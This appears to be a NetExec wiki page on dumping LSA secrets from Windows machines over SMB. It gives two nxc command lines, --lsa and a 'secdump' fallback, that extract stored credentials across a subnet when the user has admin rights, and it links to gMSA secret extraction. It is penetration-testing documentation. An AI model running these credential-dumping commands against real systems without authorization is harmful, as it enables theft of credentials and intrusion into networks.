# Dump LSA

### Dump LSA secrets using methods from secretsdump.py

{% hint style="danger" %}
Requires Domain Admin or Local Admin Priviledges on target Domain Controller
{% endhint %}

```bash
nxc smb 192.168.1.0/24 -u UserName -p 'PASSWORDHERE' --lsa
```

If this command fail you can also try the old method (similar to secretdump)

```bash
nxc smb 192.168.1.0/24 -u UserName -p 'PASSWORDHERE' --lsa secdump
```

If you found an account starting with *SC\_GMSA*{84A78B8C-56EE-465b-8496-FFB35A1B52A7} you can get the account behind:

{% content-ref url="../../ldap-protocol/extract-gmsa-secrets" %}
[extract-gmsa-secrets](https://www.netexec.wiki/ldap-protocol/extract-gmsa-secrets)
{% endcontent-ref %}
